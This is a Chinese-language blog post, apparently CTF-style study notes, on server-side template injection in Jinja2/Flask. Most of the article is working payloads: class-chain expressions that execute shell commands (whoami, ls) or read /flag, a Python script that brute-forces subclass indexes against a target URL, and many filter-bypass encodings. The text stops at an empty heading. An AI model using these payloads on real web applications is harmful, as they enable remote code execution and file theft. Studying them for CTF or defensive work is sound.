

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" href="/img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="dddkia">
  <meta name="keywords" content="">
  
    <meta name="description" content="ssti漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="ssti漏洞">
<meta property="og:url" content="http://example.com/2023/01/01/ssti%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="dddkia">
<meta property="og:description" content="ssti漏洞">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/background/fj_img/33.jpg">
<meta property="article:published_time" content="2023-01-01T02:36:13.000Z">
<meta property="article:modified_time" content="2024-07-29T08:38:24.883Z">
<meta property="article:author" content="dddkia">
<meta property="article:tag" content="web">
<meta property="article:tag" content="ssti">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/background/fj_img/33.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>ssti漏洞 - dddkia</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5-a","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":false},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"41fc030db57d5570dd22f78997dc4a7e","google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?41fc030db57d5570dd22f78997dc4a7e";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>dddkia</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background/fj_img/33.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="ssti漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        dddkia
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-01-01 10:36" pubdate>
          2023年1月1日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          27 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">ssti漏洞</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="ssti漏洞">ssti漏洞</h1>
<h2 id="模板引擎">模板引擎</h2>
<p>模板引擎是为了使用户界面与业务数据分离而产生的，它可以生成特定格式的文档，用于网站的模板引擎就会生成一个标准的文档。模板引擎将预先定义的标签字符替换为指定的业务数据，或者根据某种定义好的流程进行输出。</p>
<p>模板引擎可以使html的数据处理更加便捷、高效</p>
<p>模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸技术来进行绕过。</p>
<h2 id="ssti">SSTI</h2>
<p>SSTI就是服务器端模板注入(Server-Side Template
Injection)，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者执行命令的目的。</p>
<p>凡是使用模板的地方都可能会出现SSTI的问题，SSTI不属于任何一种语言。</p>
<p>现在web主流使用的一些框架，比如python的flask，php的thinkphp，java的spring等一般都采用成熟的的MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。</p>
<h2 id="漏洞原理">漏洞原理</h2>
<p>服务端接收了用户的恶意输入以后，未经处理就将其作为 Web
应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，用户精心构造的攻击语句插入了模板中，进行了语句的拼接，web端执行了所插入的恶意内容，因而可能导致了敏感信息泄露、代码执行、代码执行等问题。</p>
<h2 id="常见的模板引擎">常见的模板引擎</h2>
<ol type="1">
<li>python：jinja2、mako、tornado</li>
<li>php：smarty、twig</li>
<li>java：jade、velocity、Thymeleaf</li>
</ol>
<h2 id="模板漏洞">模板漏洞</h2>
<h3 id="python">python</h3>
<h4 id="tornado">tornado</h4>
<p>见的比较少，待补充</p>
<h4 id="mako">Mako</h4>
<p>遇到了再学习吧，贴个链接</p>
<p>https://sechub.in/view/2512595</p>
<h4 id="jinjia2">jinjia2</h4>
<p>flask中默认的模板引擎是jinja2</p>
<p>flask有两种渲染方式</p>
<ol type="1">
<li><code>render_template()</code> 用于渲染文件</li>
<li><code>render_template_string()</code> 用于渲染字符串</li>
</ol>
<p>ssti主要与<code>render_template_string()</code>这种方式有关。</p>
<p>jinja2使用<code>&#123;&#123;name&#125;&#125;</code>结构表示一个变量，它是一种特殊的占位符，告诉模版引擎这个位置的值从渲染模版时使用的数据中获取。jinja2
模板同样支持控制语句<code>&#123;%…%&#125;</code></p>
<p>由于在jinja2中是可以直接访问python的一些对象及其方法的，所以可以通过构造继承链来执行一些操作，比如文件读取，命令执行等</p>
<h5 id="常用方法">常用方法</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs Plain">__dict__          ：保存类实例或对象实例的属性变量键值对字典<br>__class__         ：返回一个实例所属的类，格式为a.class<br>__mro__           ：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。<br>__bases__         ：以元组形式返回一个类的基类，格式为a.class.bases<br>__base__          ：返回当前类的基类，区别是base返回单个，bases返回是元组<br>__subclasses__    ：以列表返回类的子类<br>__init__          ：类的初始化方法<br>__globals__       ：对包含函数全局变量的字典的引用<br>__builtins__      ：内建名称空间，包括了可用的内置函数<br></code></pre></td></tr></table></figure>
<p>看一个常见payload的利用过程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Plain">payload=().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;)<br></code></pre></td></tr></table></figure>
<p>解释：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python">()：创建一个空的<span class="hljs-built_in">tuple</span>对象。 <br>.__class__：获取这个<span class="hljs-built_in">tuple</span>对象的类，也就是<span class="hljs-built_in">tuple</span>类。 <br>.__bases__[<span class="hljs-number">0</span>]：访问<span class="hljs-built_in">tuple</span>类的基类，也就是<span class="hljs-built_in">object</span>类。<br>.__subclasses__()：调用<span class="hljs-built_in">object</span>类的__subclasses__方法，这个方法返回所有从<span class="hljs-built_in">object</span>类派生的类的列表。 <br>[<span class="hljs-number">64</span>]：从这个列表中选择第<span class="hljs-number">65</span>个类。不同的Python环境中这个索引可能对应不同的类<br>.__init__：获取warnings.catch_warnings类的初始化方法。 <br>.__globals__：访问这个初始化方法的全局变量字典。 <br>[<span class="hljs-string">&#x27;__builtins__&#x27;</span>]：从全局变量字典中获取__builtins__模块，这个模块包含了所有的内置函数和变量。 <br>[<span class="hljs-string">&#x27;eval&#x27;</span>]：从__builtins__模块中获取<span class="hljs-built_in">eval</span>函数。 <br>(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)：调用<span class="hljs-built_in">eval</span>函数执行字符串中的代码。这段代码使用<span class="hljs-built_in">__import__</span>函数导入os模块，并调用os.system方法执行whoami命令<br></code></pre></td></tr></table></figure>
<h5 id="常见的利用子类以及模块">常见的利用子类以及模块</h5>
<p>重载过的<code>__init__</code>类的类有<code>__globals__</code>属性，用<code>__builtins__</code>来查看引用会返回很多dict，找到能利用的</p>
<h6 id="任意文件读取">任意文件读取</h6>
<p><strong>python2</strong></p>
<p>&lt;type 'file'&gt;</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;[].__class__.__base__.__subclasses__()[<span class="hljs-number">40</span>](<span class="hljs-string">&#x27;/flag&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<p><strong>python3</strong></p>
<p>_frozen_importlib模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib._ModuleLock&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib._DummyModuleLock&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib._ModuleLockManager&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib.ModuleSpec&#x27;</span>&gt;<br>&#123;&#123;[].__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">104</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;open&#x27;</span>](<span class="hljs-string">&#x27;/flag&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<p>click.utils.LazyFile模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;click.utils.LazyFile&#x27;</span>&gt;<br>&#123;&#123;[].__class__.__mro__[<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">345</span>](<span class="hljs-string">&#x27;/flag&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<h6 id="命令执行">命令执行</h6>
<p><strong>python2</strong></p>
<p>site模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;site._Printer&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;site.Quitter&#x27;</span>&gt;<br>&#123;&#123;[].__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">59</span>].__init__.__globals__.__builtins__.<span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;os&#x27;</span>).popen(<span class="hljs-string">&#x27;ls&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<p>warnings类中的linecache</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;warnings.WarningMessage&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;warnings.catch_warnings&#x27;</span>&gt;<br>&#123;&#123;[].__class__.__base__.__subclasses__()[<span class="hljs-number">59</span>].__init__.__globals__[<span class="hljs-string">&#x27;linecache&#x27;</span>].__dict__.values()[<span class="hljs-number">12</span>].__dict__.values()[<span class="hljs-number">144</span>](<span class="hljs-string">&#x27;ls&#x27;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>
<p><strong>python3</strong></p>
<p>subprocess.Popen模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;subprocess.Popen&#x27;</span>&gt;<br>&#123;&#123;[].__class__.__mro__[<span class="hljs-number">2</span>].__subclasses__()[<span class="hljs-number">258</span>](<span class="hljs-string">&#x27;ls&#x27;</span>,shell=<span class="hljs-literal">True</span>,stdout=-<span class="hljs-number">1</span>).communicate()[<span class="hljs-number">0</span>].strip()&#125;&#125;<br></code></pre></td></tr></table></figure>
<p>_frozen_importlib模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib._ModuleLock&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib._DummyModuleLock&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib._ModuleLockManager&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;_frozen_importlib.ModuleSpec&#x27;</span>&gt;<br>[].__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">104</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;exec&#x27;</span>](<span class="hljs-string">&#x27;open(&quot;/flag&quot;).read()&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>os模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs Python">&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;os._wrap_close&#x27;</span>&gt;<br>&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;os._AddedDllDirectory&#x27;</span>&gt;<br>[].__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">147</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&quot;ls&quot;</span>).read()<br></code></pre></td></tr></table></figure>
<h5 id="寻找可用的子类">寻找可用的子类</h5>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">500</span>):<br>    url = <span class="hljs-string">&quot;http://ip/?ssti=&#123;&#123;().__class__.__bases__[0].__subclasses__()[&quot;</span>+<span class="hljs-built_in">str</span>(i)+<span class="hljs-string">&quot;]&#125;&#125;&quot;</span><br>    res = requests.get(url=url)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;FileLoader&#x27;</span> <span class="hljs-keyword">in</span> res.text: <span class="hljs-comment">#以FileLoader为例</span><br>        <span class="hljs-built_in">print</span>(i)<br></code></pre></td></tr></table></figure>
<p>更多类与模块参考</p>
<p><a
target="_blank" rel="noopener" href="https://misakikata.github.io/2020/04/python-沙箱逃逸与SSTI">python
沙箱逃逸与SSTI</a></p>
<h5 id="绕过">绕过</h5>
<h6 id="过滤点号.">过滤点号.</h6>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;__class__&#x27;</span>]<br><span class="hljs-string">&#x27;&#x27;</span>|attr(<span class="hljs-string">&#x27;__class__&#x27;</span>)<br><span class="hljs-built_in">getattr</span>(<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-string">&quot;__class__&quot;</span>)<br></code></pre></td></tr></table></figure>
<h6 id="过滤中括号">过滤中括号[]</h6>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-string">&#x27;&#x27;</span>.__getattribute__(<span class="hljs-string">&#x27;__class__&#x27;</span>)<br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__.__getitem__(<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure>
<h6 id="过滤关键字">过滤关键字</h6>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&quot;__cla&quot;</span><span class="hljs-string">&quot;ss__&quot;</span>]<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&quot;__cla&quot;</span>+<span class="hljs-string">&quot;ss__&quot;</span>]<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;__cla&#x27;</span>~<span class="hljs-string">&#x27;ss__&#x27;</span>]<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&quot;\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f&quot;</span>]<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&quot;__ssalc__&quot;</span>][::-<span class="hljs-number">1</span>]<br><span class="hljs-string">&#x27;&#x27;</span>|attr(<span class="hljs-string">&quot;__ssalc__&quot;</span>|reverse)<br><span class="hljs-string">&#x27;&#x27;</span>.__getattribute__(<span class="hljs-string">&quot;__ssalc__&quot;</span>[::-<span class="hljs-number">1</span>])<br><span class="hljs-string">&#x27;&#x27;</span>|attr(<span class="hljs-string">&quot;__claee__&quot;</span>|replace(<span class="hljs-string">&quot;ee&quot;</span>,<span class="hljs-string">&quot;ss&quot;</span>))<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&quot;&#123;0:c&#125;&#123;1:c&#125;&#123;2:c&#125;&#123;3:c&#125;&#123;4:c&#125;&#123;5:c&#125;&#123;6:c&#125;&#123;7:c&#125;&#123;8:c&#125;&quot;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-number">95</span>,<span class="hljs-number">95</span>,<span class="hljs-number">99</span>,<span class="hljs-number">108</span>,<span class="hljs-number">97</span>,<span class="hljs-number">115</span>,<span class="hljs-number">115</span>,<span class="hljs-number">95</span>,<span class="hljs-number">95</span>)]<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&quot;%c%c%c%c%c%c%c%c%c&quot;</span>|<span class="hljs-built_in">format</span>(<span class="hljs-number">95</span>,<span class="hljs-number">95</span>,<span class="hljs-number">99</span>,<span class="hljs-number">108</span>,<span class="hljs-number">97</span>,<span class="hljs-number">115</span>,<span class="hljs-number">115</span>,<span class="hljs-number">95</span>,<span class="hljs-number">95</span>)]<br><span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="hljs-number">40</span>](<span class="hljs-string">&quot;fla&quot;</span>.join(<span class="hljs-string">&quot;/g&quot;</span>)).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<h6 id="过滤单双引号">过滤单双引号'/"</h6>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;config.__class__.__init__.__globals__[request.args.m].popen(request.args.command).read()&#125;&#125;&amp;m=os&amp;command=cat%<span class="hljs-number">20</span>/flag<br>&#123;&#123;lipsum.__globals__.os.popen(request.values.gg).read()&#125;&#125;&amp;gg=cat /flag<br>&#123;&#123;lipsum.__globals__.os.popen(request.cookies.get(<span class="hljs-string">&#x27;aa&#x27;</span>).read()&#125;&#125; Cookie:aa=cat /flag<br>&#123;% <span class="hljs-built_in">set</span> <span class="hljs-built_in">chr</span>=().__class__.__mro__[<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">139</span>].__init__.__globals__.__builtins__.<span class="hljs-built_in">chr</span>%&#125;&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">139</span>].__init__.__globals__.__builtins__.<span class="hljs-built_in">__import__</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-number">111</span>)%2Bchr(<span class="hljs-number">115</span>)).popen(<span class="hljs-built_in">chr</span>(<span class="hljs-number">119</span>)%2Bchr(<span class="hljs-number">104</span>)%2Bchr(<span class="hljs-number">111</span>)%2Bchr(<span class="hljs-number">97</span>)%2Bchr(<span class="hljs-number">109</span>)%2Bchr(<span class="hljs-number">105</span>)).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<h6 id="过滤了双花括号">过滤了双花括号</h6>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web/" class="category-chain-item">web</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
        <a href="/tags/ssti/" class="print-no-link">#ssti</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>ssti漏洞</div>
      <div>http://example.com/2023/01/01/ssti漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>dddkia</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年1月1日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/01/01/sql%E6%B3%A8%E5%85%A5/" title="sql注入">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sql注入</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  




  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
